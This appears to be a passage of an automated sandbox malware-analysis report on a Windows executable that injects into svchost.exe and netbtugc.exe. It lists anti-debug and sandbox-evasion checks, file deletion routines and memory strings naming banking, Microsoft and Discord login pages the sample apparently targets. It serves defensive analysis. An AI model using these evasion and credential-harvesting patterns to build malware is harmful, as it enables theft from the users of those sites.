Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C0FFA0 push esi; iretd	10_2_02C0FFA5

Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0095F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0095F98E
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_009D1C41

Source: C:\Users\user\Desktop\Document 151-512024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\Document 151-512024.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-99359

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0337096E rdtsc

2_2_0337096E

Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 1620			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 8352			Jump to behavior

Source: C:\Users\user\Desktop\Document 151-512024.exe	API coverage: 3.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8188	Thread sleep count: 1620 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8188	Thread sleep time: -3240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8188	Thread sleep count: 8352 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8188	Thread sleep time: -16704000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe TID: 932	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe TID: 932	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe TID: 932	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe TID: 932	Thread sleep time: -31000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009ADBBE
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0097C2A2 FindFirstFileExW,	0_2_0097C2A2
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B68EE FindFirstFileW,FindClose,	0_2_009B68EE
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_009B698F
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009AD076
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009AD3A9
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009B9642
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009B979D
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_009B9B2B
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_009B5C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C1BAB0 FindFirstFileW,FindNextFileW,FindClose,	10_2_02C1BAB0

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009442DE

Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: F56GKLK7U4.10.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: F56GKLK7U4.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: F56GKLK7U4.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: F56GKLK7U4.10.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: F56GKLK7U4.10.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: firefox.exe, 0000000E.00000002.1687777846.00000276CE5AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk%
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: F56GKLK7U4.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: F56GKLK7U4.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: F56GKLK7U4.10.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: F56GKLK7U4.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: F56GKLK7U4.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: F56GKLK7U4.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: F56GKLK7U4.10.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3688891608.000000000073F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|
Source: F56GKLK7U4.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: F56GKLK7U4.10.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: F56GKLK7U4.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: F56GKLK7U4.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: F56GKLK7U4.10.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: F56GKLK7U4.10.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: F56GKLK7U4.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: F56GKLK7U4.10.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: F56GKLK7U4.10.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: F56GKLK7U4.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: F56GKLK7U4.10.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: F56GKLK7U4.10.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: F56GKLK7U4.10.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0337096E rdtsc

2_2_0337096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417823 LdrLoadDll,

2_2_00417823

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009BEAA2 BlockInput,

0_2_009BEAA2

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_00972622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00972622

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009442DE

Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00964CE8 mov eax, dword ptr fs:[00000030h]	0_2_00964CE8
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_01BC3550 mov eax, dword ptr fs:[00000030h]	0_2_01BC3550
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_01BC34F0 mov eax, dword ptr fs:[00000030h]	0_2_01BC34F0
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_01BC1ED0 mov eax, dword ptr fs:[00000030h]	0_2_01BC1ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340634F mov eax, dword ptr fs:[00000030h]	2_2_0340634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]	2_2_0332C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]	2_2_03350310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]	2_2_033D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]	2_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03408324 mov ecx, dword ptr fs:[00000030h]	2_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]	2_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]	2_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]	2_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h]	2_2_033D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]	2_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]	2_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]	2_2_033663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]	2_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]	2_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]	2_2_033EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]	2_2_0332823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340625D mov eax, dword ptr fs:[00000030h]	2_2_0340625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]	2_2_0332826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]	2_2_0332A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]	2_2_03336259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]	2_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]	2_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]	2_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]	2_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]	2_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]	2_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034062D6 mov eax, dword ptr fs:[00000030h]	2_2_034062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]	2_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]	2_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]	2_2_03360124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]	2_2_03404164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]	2_2_03404164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]	2_2_033F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
